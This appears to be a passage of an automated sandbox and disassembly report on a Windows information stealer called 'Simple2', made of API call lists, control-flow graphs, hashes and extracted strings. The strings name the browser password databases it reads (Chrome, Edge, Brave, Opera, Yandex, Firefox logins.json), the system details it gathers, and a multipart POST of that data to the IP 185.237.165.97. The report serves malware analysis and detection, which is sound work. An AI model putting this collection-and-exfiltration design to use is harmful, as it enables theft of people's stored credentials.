              • Part of subcall function 00007FF6876B94E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9664
              • Part of subcall function 00007FF6876B94E0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B966B
              • Part of subcall function 00007FF6876B94E0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9678
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6876B3434
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6876B3444
            • WinHttpCloseHandle.WINHTTP ref: 00007FF6876B344D
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B348C
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B34DA
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3522
            • WinHttpCloseHandle.WINHTTP ref: 00007FF6876B3541
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B3589
            • GetLastError.KERNEL32 ref: 00007FF6876B3590
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6876B35B0
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6876B35C0
            • WinHttpCloseHandle.WINHTTP ref: 00007FF6876B35D3
            • GetLastError.KERNEL32 ref: 00007FF6876B35DB
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6876B35FB
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6876B360B
            • WinHttpCloseHandle.WINHTTP ref: 00007FF6876B3614
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF6876B363C
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B3703
              • Part of subcall function 00007FF6876B1270: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6876BB1C3), ref: 00007FF6876B12B4
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6876B364C
              • Part of subcall function 00007FF6876B1310: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF6876B131B
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B367E
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6876B36C6
              • Part of subcall function 00007FF6876B9BB0: memcpy.VCRUNTIME140 ref: 00007FF6876B9BE8
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B3709
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B370F
              • Part of subcall function 00007FF6876BA6C0: memcpy.VCRUNTIME140 ref: 00007FF6876BA787
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B3721
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B3727
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6876B3733
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B3786
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@$Httpmemcpy$Concurrency::cancel_current_task$V01@@$CloseErrorHandleLast$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@OpenRequest$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?setw@std@@?sputc@?$basic_streambuf@?uncaught_exception@std@@AttributesConnectD@std@@@1@_FileHeadersJ@1@_Osfx@?$basic_ostream@_QueryReceiveResponseSendSmanip@_U?$_V12@V21@@V?$basic_streambuf@Vios_base@1@Xlength_error@std@@__std_exception_copyisalnummallocmemcmp
            • String ID: $" }$", "ip": "$"; filename="login_data$--WebKitFormBoundary$.json"$.sqlite"$/userdata$Content-Disposition: form-data; name="sysinfo"$Content-Type: application/json$Content-Type: application/x-sqlite3$Content-Type: multipart/form-data; boundary=WebKitFormBoundary$File is found: $File not found: $FileData is empty$POST$WinHTTP/1.0$brave$chrome$chromebeta$chromium$chromium$chromium$firefox$fo": "$msedge$name="$opera$operagx$yandex
            • API String ID: 1510262236-3911588127
            • Opcode ID: c59d58eccc0e085e96d167c9425b2afd8dd48b5376d94124c565bb9e2dc95698
            • Instruction ID: 518217e26d893877037ab76698d8eb719e4bde9d785a439dead12fc08662d181
            • Opcode Fuzzy Hash: c59d58eccc0e085e96d167c9425b2afd8dd48b5376d94124c565bb9e2dc95698
            • Instruction Fuzzy Hash: 30F2A162E58B86C5EF248B25D8443E92361FF46794F404239EA6D8AAD9DF7CF5C4E300

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 501 7ff6876b5540-7ff6876b55dd GetConsoleWindow ShowWindow call 7ff6876b9260 call 7ff6876b41f0 call 7ff6876b7f40 508 7ff6876b55df-7ff6876b55f1 501->508 509 7ff6876b5614-7ff6876b564b call 7ff6876b9260 call 7ff6876b3e70 call 7ff6876b7f40 501->509 510 7ff6876b560f call 7ff6876bb180 508->510 511 7ff6876b55f3-7ff6876b5606 508->511 520 7ff6876b5682-7ff6876b57a6 call 7ff6876b9260 GetSystemInfo memset call 7ff6876b6390 call 7ff6876b94e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z call 7ff6876b94e0 * 2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z call 7ff6876b94e0 call 7ff6876b8760 call 7ff6876b7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6876b7f40 509->520 521 7ff6876b564d-7ff6876b565f 509->521 510->509 511->510 513 7ff6876b5608-7ff6876b560e _invalid_parameter_noinfo_noreturn 511->513 513->510 544 7ff6876b57a8-7ff6876b57ba 520->544 545 7ff6876b57dd-7ff6876b58da call 7ff6876b9260 GlobalMemoryStatusEx memset call 7ff6876b6390 call 7ff6876b94e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff6876b94e0 call 7ff6876b8760 call 7ff6876b7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6876b7f40 520->545 522 7ff6876b5661-7ff6876b5674 521->522 523 7ff6876b567d call 7ff6876bb180 521->523 522->523 525 7ff6876b5676-7ff6876b567c _invalid_parameter_noinfo_noreturn 522->525 523->520 525->523 546 7ff6876b57d8 call 7ff6876bb180 544->546 547 7ff6876b57bc-7ff6876b57cf 544->547 564 7ff6876b5911-7ff6876b5948 call 7ff6876b9260 call 7ff6876b37a0 call 7ff6876b7f40 545->564 565 7ff6876b58dc-7ff6876b58ee 545->565 546->545 547->546 550 7ff6876b57d1-7ff6876b57d7 _invalid_parameter_noinfo_noreturn 547->550 550->546 576 7ff6876b597f-7ff6876b59db call 7ff6876b9260 malloc memset call 7ff6876b6390 GetAdaptersInfo 564->576 577 7ff6876b594a-7ff6876b595c 564->577 567 7ff6876b58f0-7ff6876b5903 565->567 568 7ff6876b590c call 7ff6876bb180 565->568 567->568 571 7ff6876b5905-7ff6876b590b _invalid_parameter_noinfo_noreturn 567->571 568->564 571->568 586 7ff6876b59e9-7ff6876b59f8 GetAdaptersInfo 576->586 587 7ff6876b59dd-7ff6876b59e6 malloc 576->587 578 7ff6876b595e-7ff6876b5971 577->578 579 7ff6876b597a call 7ff6876bb180 577->579 578->579 582 7ff6876b5973-7ff6876b5979 _invalid_parameter_noinfo_noreturn 578->582 579->576 582->579 588 7ff6876b5a6e-7ff6876b5a71 586->588 589 7ff6876b59fa-7ff6876b5a00 586->589 587->586 590 7ff6876b5a73-7ff6876b5a76 free 588->590 591 7ff6876b5a7c-7ff6876b5af8 call 7ff6876b8760 call 7ff6876b7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6876b7f40 588->591 589->591 592 7ff6876b5a02-7ff6876b5a6a call 7ff6876b94e0 * 6 589->592 590->591 605 7ff6876b5b2f-7ff6876b5b51 call 7ff6876b4570 591->605 606 7ff6876b5afa-7ff6876b5b0c 591->606 628 7ff6876b5a6c 592->628 617 7ff6876b637f-7ff6876b6384 call 7ff6876b1310 605->617 618 7ff6876b5b57-7ff6876b5b87 605->618 609 7ff6876b5b0e-7ff6876b5b21 606->609 610 7ff6876b5b2a call 7ff6876bb180 606->610 609->610 614 7ff6876b5b23-7ff6876b5b29 _invalid_parameter_noinfo_noreturn 609->614 610->605 614->610 629 7ff6876b6385-7ff6876b638a call 7ff6876b1270 617->629 621 7ff6876b5c04-7ff6876b5c8f memcpy call 7ff6876b9260 call 7ff6876b7f40 618->621 622 7ff6876b5b89-7ff6876b5b93 618->622 646 7ff6876b5c91-7ff6876b5ca3 621->646 647 7ff6876b5cc7-7ff6876b5cd0 621->647 626 7ff6876b5bc5-7ff6876b5bdc 622->626 627 7ff6876b5b95-7ff6876b5ba2 622->627 632 7ff6876b5bde-7ff6876b5be5 626->632 633 7ff6876b5bed-7ff6876b5bf0 626->633 631 7ff6876b5ba6-7ff6876b5bb1 call 7ff6876bb188 627->631 628->590 648 7ff6876b5bb7-7ff6876b5bc3 631->648 649 7ff6876b5cfb-7ff6876b5d01 _invalid_parameter_noinfo_noreturn 631->649 632->629 639 7ff6876b5beb 632->639 634 7ff6876b5bf2-7ff6876b5bfa call 7ff6876bb188 633->634 635 7ff6876b5bfc 633->635 641 7ff6876b5bff 634->641 635->641 639->631 641->621 653 7ff6876b5cc1-7ff6876b5cc6 call 7ff6876bb180 646->653 654 7ff6876b5ca5-7ff6876b5cb8 646->654 650 7ff6876b5cd2-7ff6876b5ce4 647->650 651 7ff6876b5d07-7ff6876b5d3e call 7ff6876b9260 call 7ff6876b3a40 call 7ff6876b7f40 647->651 648->641 652 7ff6876b5d02 call 7ff6876bb180 649->652 650->652 655 7ff6876b5ce6-7ff6876b5cf9 650->655 666 7ff6876b5d40-7ff6876b5d52 651->666 667 7ff6876b5d75-7ff6876b5dc4 call 7ff6876b9260 memset call 7ff6876b6390 NetGetJoinInformation 651->667 652->651 653->647 654->653 658 7ff6876b5cba-7ff6876b5cc0 _invalid_parameter_noinfo_noreturn 654->658 655->649 655->652 658->653 669 7ff6876b5d70 call 7ff6876bb180 666->669 670 7ff6876b5d54-7ff6876b5d67 666->670 676 7ff6876b5e8a-7ff6876b5f06 call 7ff6876b8760 call 7ff6876b7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6876b7f40 667->676 677 7ff6876b5dca-7ff6876b5dd6 667->677 669->667 670->669 673 7ff6876b5d69-7ff6876b5d6f _invalid_parameter_noinfo_noreturn 670->673 673->669 693 7ff6876b5f08-7ff6876b5f1a 676->693 694 7ff6876b5f3d-7ff6876b5f74 GetTimeZoneInformation memset call 7ff6876b6390 676->694 678 7ff6876b5dd8 677->678 679 7ff6876b5deb-7ff6876b5e40 call 7ff6876b8830 call 7ff6876b94e0 call 7ff6876baed0 call 7ff6876b94e0 677->679 681 7ff6876b5de0-7ff6876b5de9 678->681 703 7ff6876b5e42-7ff6876b5e54 679->703 704 7ff6876b5e77-7ff6876b5e85 679->704 681->679 681->681 696 7ff6876b5f38 call 7ff6876bb180 693->696 697 7ff6876b5f1c-7ff6876b5f2f 693->697 705 7ff6876b5f76 694->705 706 7ff6876b5f8b-7ff6876b5fe4 call 7ff6876b8830 call 7ff6876b94e0 call 7ff6876baed0 call 7ff6876b94e0 694->706 696->694 697->696 700 7ff6876b5f31-7ff6876b5f37 _invalid_parameter_noinfo_noreturn 697->700 700->696 707 7ff6876b5e72 call 7ff6876bb180 703->707 708 7ff6876b5e56-7ff6876b5e69 703->708 704->676 709 7ff6876b5f80-7ff6876b5f89 705->709 720 7ff6876b5fe6-7ff6876b5ff8 706->720 721 7ff6876b601b-7ff6876b6095 call 7ff6876b8760 call 7ff6876b7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6876b7f40 706->721 707->704 708->707 711 7ff6876b5e6b-7ff6876b5e71 _invalid_parameter_noinfo_noreturn 708->711 709->706 709->709 711->707 722 7ff6876b6016 call 7ff6876bb180 720->722 723 7ff6876b5ffa-7ff6876b600d 720->723 732 7ff6876b6097-7ff6876b60a9 721->732 733 7ff6876b60cc-7ff6876b6191 memset call 7ff6876b6390 GetModuleFileNameA call 7ff6876b94e0 * 3 call 7ff6876b8760 call 7ff6876b7790 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff6876b7f40 721->733 722->721 723->722 725 7ff6876b600f-7ff6876b6015 _invalid_parameter_noinfo_noreturn 723->725 725->722 734 7ff6876b60c7 call 7ff6876bb180 732->734 735 7ff6876b60ab-7ff6876b60be 732->735 752 7ff6876b6193-7ff6876b61a5 733->752 753 7ff6876b61c8-7ff6876b61ff call 7ff6876b9260 call 7ff6876b3c40 call 7ff6876b7f40 733->753 734->733 735->734 737 7ff6876b60c0-7ff6876b60c6 _invalid_parameter_noinfo_noreturn 735->737 737->734 754 7ff6876b61c3 call 7ff6876bb180 752->754 755 7ff6876b61a7-7ff6876b61ba 752->755 764 7ff6876b6201-7ff6876b6213 753->764 765 7ff6876b6236-7ff6876b626a call 7ff6876b4cb0 call 7ff6876b1ac0 753->765 754->753 755->754 757 7ff6876b61bc-7ff6876b61c2 _invalid_parameter_noinfo_noreturn 755->757 757->754 766 7ff6876b6231 call 7ff6876bb180 764->766 767 7ff6876b6215-7ff6876b6228 764->767 773 7ff6876b626f-7ff6876b6277 765->773 766->765 767->766 769 7ff6876b622a-7ff6876b6230 _invalid_parameter_noinfo_noreturn 767->769 769->766 774 7ff6876b62c1-7ff6876b62c9 773->774 775 7ff6876b6279-7ff6876b629a call 7ff6876b9cb0 773->775 776 7ff6876b62ff-7ff6876b6317 774->776 777 7ff6876b62cb-7ff6876b62dc 774->777 788 7ff6876b62b8-7ff6876b62c0 call 7ff6876bb180 775->788 789 7ff6876b629c-7ff6876b62af 775->789 781 7ff6876b6319-7ff6876b632a 776->781 782 7ff6876b634d-7ff6876b637e call 7ff6876bb160 776->782 779 7ff6876b62de-7ff6876b62f1 777->779 780 7ff6876b62fa call 7ff6876bb180 777->780 779->780 784 7ff6876b62f3-7ff6876b62f9 _invalid_parameter_noinfo_noreturn 779->784 780->776 786 7ff6876b6348 call 7ff6876bb180 781->786 787 7ff6876b632c-7ff6876b633f 781->787 784->780 786->782 787->786 791 7ff6876b6341-7ff6876b6347 _invalid_parameter_noinfo_noreturn 787->791 788->774 789->788 793 7ff6876b62b1-7ff6876b62b7 _invalid_parameter_noinfo_noreturn 789->793 791->786 793->788
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$D@std@@@std@@U?$char_traits@$memset$??1?$basic_ios@??1?$basic_iostream@$??6?$basic_ostream@Infomemcpy$AdaptersInformationOpenV01@ValueWindowmalloc$CloseConcurrency::cancel_current_taskConsoleFileGlobalJoinMemoryModuleNameShowStatusSystemTimeV01@_Xlength_error@std@@Zonefree
            • String ID: ADAPTERS INFO:$CPU INFO:$DISK INFO:$DOMAIN AND TZ INFO:$LOCALE INFO:$PROCESSES RUNNING:$RAM INFO:$USERS INFO:$ IP: $ MB$185.237.165.97$@$Adapter: $Domain: $Executable Path: $IP Address: $MACHINE INFO:$Number of Cores: $Processor Architecture: $Time Zone: $Total Physical Memory:
            • API String ID: 1449153876-4066422610
            • Opcode ID: d091092116045a41f88bcc4cb545aace3c4bd9ba271f4ff16ecd96e62a7613b6
            • Instruction ID: f2cf3236cced1a9fa235aa90202a82b6f5e4e18becfc0d5c0f95e132b459ab91
            • Opcode Fuzzy Hash: d091092116045a41f88bcc4cb545aace3c4bd9ba271f4ff16ecd96e62a7613b6
            • Instruction Fuzzy Hash: A7828462A98A86D5EF10DB24D4402ED2321FF86794F40423AF65D86AEADF7CF5C5E340

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 797 7ff6876b4cb0-7ff6876b4cfa malloc 798 7ff6876b4d0c-7ff6876b4d70 GetEnvironmentVariableW call 7ff6876b7df0 free call 7ff6876b9910 call 7ff6876b4800 797->798 799 7ff6876b4cfc-7ff6876b4d07 797->799 809 7ff6876b4d72-7ff6876b4d89 798->809 810 7ff6876b4dac-7ff6876b4de8 call 7ff6876b9910 call 7ff6876b4800 798->810 800 7ff6876b5509-7ff6876b5532 call 7ff6876bb160 799->800 811 7ff6876b4da7 call 7ff6876bb180 809->811 812 7ff6876b4d8b-7ff6876b4d9e 809->812 818 7ff6876b4ded-7ff6876b4df9 810->818 811->810 812->811 814 7ff6876b4da0-7ff6876b4da6 _invalid_parameter_noinfo_noreturn 812->814 814->811 819 7ff6876b4e37-7ff6876b4f97 call 7ff6876b9910 * 8 call 7ff6876b8d10 call 7ff6876b9910 call 7ff6876ba8d0 818->819 820 7ff6876b4dfb-7ff6876b4e14 818->820 847 7ff6876b4fd4-7ff6876b4fee call 7ff6876ba4f0 819->847 848 7ff6876b4f99-7ff6876b4fd2 memcpy 819->848 822 7ff6876b4e32 call 7ff6876bb180 820->822 823 7ff6876b4e16-7ff6876b4e29 820->823 822->819 823->822 826 7ff6876b4e2b-7ff6876b4e31 _invalid_parameter_noinfo_noreturn 823->826 826->822 849 7ff6876b4ff3-7ff6876b5096 call 7ff6876b8d10 call 7ff6876b9910 call 7ff6876ba8d0 847->849 848->849 857 7ff6876b50d3-7ff6876b50ed call 7ff6876ba4f0 849->857 858 7ff6876b5098-7ff6876b50d1 memcpy 849->858 859 7ff6876b50f2-7ff6876b519d call 7ff6876bb188 857->859 858->859 863 7ff6876b51a0-7ff6876b51c4 call 7ff6876b9130 859->863 866 7ff6876b51c6-7ff6876b51fb call 7ff6876b9cb0 call 7ff6876bb1c4 863->866 871 7ff6876b5237-7ff6876b5253 866->871 872 7ff6876b51fd-7ff6876b5214 866->872 875 7ff6876b528e-7ff6876b52a8 871->875 876 7ff6876b5255-7ff6876b526b 871->876 873 7ff6876b5232 call 7ff6876bb180 872->873 874 7ff6876b5216-7ff6876b5229 872->874 873->871 874->873 877 7ff6876b522b-7ff6876b5231 _invalid_parameter_noinfo_noreturn 874->877 881 7ff6876b52e4-7ff6876b52ed 875->881 882 7ff6876b52aa-7ff6876b52c0 875->882 879 7ff6876b5289 call 7ff6876bb180 876->879 880 7ff6876b526d-7ff6876b5280 876->880 877->873 879->875 880->879 885 7ff6876b5282-7ff6876b5288 _invalid_parameter_noinfo_noreturn 880->885 883 7ff6876b52ef-7ff6876b5306 881->883 884 7ff6876b5329-7ff6876b5345 881->884 887 7ff6876b52de-7ff6876b52e3 call 7ff6876bb180 882->887 888 7ff6876b52c2-7ff6876b52d5 882->888 890 7ff6876b5324 call 7ff6876bb180 883->890 891 7ff6876b5308-7ff6876b531b 883->891 892 7ff6876b5380-7ff6876b539a 884->892 893 7ff6876b5347-7ff6876b535d 884->893 885->879 887->881 888->887 894 7ff6876b52d7-7ff6876b52dd _invalid_parameter_noinfo_noreturn 888->894 890->884 891->890 896 7ff6876b531d-7ff6876b5323 _invalid_parameter_noinfo_noreturn 891->896 900 7ff6876b53d5-7ff6876b5415 892->900 901 7ff6876b539c-7ff6876b53b2 892->901 898 7ff6876b535f-7ff6876b5372 893->898 899 7ff6876b537b call 7ff6876bb180 893->899 894->887 896->890 898->899 906 7ff6876b5374-7ff6876b537a _invalid_parameter_noinfo_noreturn 898->906 899->892 904 7ff6876b544e-7ff6876b5470 900->904 905 7ff6876b5417-7ff6876b542b 900->905 902 7ff6876b53d0 call 7ff6876bb180 901->902 903 7ff6876b53b4-7ff6876b53c7 901->903 902->900 903->902 908 7ff6876b53c9-7ff6876b53cf _invalid_parameter_noinfo_noreturn 903->908 912 7ff6876b5472-7ff6876b5486 904->912 913 7ff6876b54a9-7ff6876b54cb 904->913 910 7ff6876b5449 call 7ff6876bb180 905->910 911 7ff6876b542d-7ff6876b5440 905->911 906->899 908->902 910->904 911->910 915 7ff6876b5442-7ff6876b5448 _invalid_parameter_noinfo_noreturn 911->915 917 7ff6876b54a4 call 7ff6876bb180 912->917 918 7ff6876b5488-7ff6876b549b 912->918 913->800 914 7ff6876b54cd-7ff6876b54e6 913->914 919 7ff6876b5504 call 7ff6876bb180 914->919 920 7ff6876b54e8-7ff6876b54fb 914->920 915->910 917->913 918->917 921 7ff6876b549d-7ff6876b54a3 _invalid_parameter_noinfo_noreturn 918->921 919->800 920->919 923 7ff6876b54fd-7ff6876b5503 _invalid_parameter_noinfo_noreturn 920->923 921->917 923->919
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$EnvironmentVariablefreemalloc
            • String ID: USERPROFILE$\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\AppData\Local\Chromium\User Data\Default\Login Data$\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data$\AppData\Local\Google\Chrome\User Data\Default\Login Data$\AppData\Local\Microsoft\Edge\User Data\Default\Login Data$\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data$\AppData\Roaming\Mozilla\Firefox\Profiles$\AppData\Roaming\Mozilla\Firefox\Profiles\$\AppData\Roaming\Opera Software\Opera GX Stable\Login Data$\AppData\Roaming\Opera Software\Opera Stable\Login Data$\logins.json$\times.json$default$release
            • API String ID: 716798019-3135576060
            • Opcode ID: 9b24530ae91db742ab871ae2567c9780c52df1db04768c1315b303abc1aed9d6
            • Instruction ID: f337bf518f22d2ff58ff2440fada2c0aed5c844e7af01273fcfd58510b382f8c
            • Opcode Fuzzy Hash: 9b24530ae91db742ab871ae2567c9780c52df1db04768c1315b303abc1aed9d6
            • Instruction Fuzzy Hash: 2B328F72A58BC6D5EF209F64D8443EC2361FF86794F405236EA5C96AA9DF78E2C4D300

            Control-flow Graph

            APIs
            • memset.VCRUNTIME140(?), ref: 00007FF6876B423F
            • memset.VCRUNTIME140(?), ref: 00007FF6876B4253
            • memset.VCRUNTIME140(?), ref: 00007FF6876B4267
            • memset.VCRUNTIME140(?), ref: 00007FF6876B427B
            • memset.VCRUNTIME140(?), ref: 00007FF6876B428D
              • Part of subcall function 00007FF6876B6390: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B63CA
              • Part of subcall function 00007FF6876B6390: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF6876B63E6
              • Part of subcall function 00007FF6876B6390: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6876B6418
            • RegOpenKeyExA.KERNELBASE(?), ref: 00007FF6876B42BE
            • RegGetValueA.KERNELBASE ref: 00007FF6876B42F2
            • RegCloseKey.KERNELBASE ref: 00007FF6876B432D
            • RegOpenKeyExA.KERNELBASE ref: 00007FF6876B435C
            • RegGetValueA.KERNELBASE ref: 00007FF6876B4395
            • RegCloseKey.ADVAPI32 ref: 00007FF6876B43D3
            • RegOpenKeyExA.KERNELBASE ref: 00007FF6876B4402
            • RegGetValueA.KERNELBASE ref: 00007FF6876B443F
            • RegGetValueA.KERNELBASE ref: 00007FF6876B44A7
            • RegCloseKey.KERNELBASE ref: 00007FF6876B44E5
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B4539
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6876B4543
              • Part of subcall function 00007FF6876B94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9559
              • Part of subcall function 00007FF6876B94E0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9579
              • Part of subcall function 00007FF6876B94E0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9589
              • Part of subcall function 00007FF6876B94E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9664
              • Part of subcall function 00007FF6876B94E0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B966B
              • Part of subcall function 00007FF6876B94E0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B9678
              • Part of subcall function 00007FF6876B94E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B95D6
              • Part of subcall function 00007FF6876B94E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B95FD
              • Part of subcall function 00007FF6876B94E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF6876B1970), ref: 00007FF6876B961E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2206805229.00007FF6876B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6876B0000, based on PE: true
            • Associated: 00000000.00000002.2206787950.00007FF6876B0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206825729.00007FF6876BD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206848878.00007FF6876C4000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2206869982.00007FF6876C5000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff6876b0000_Simple2.jbxd
            Similarity
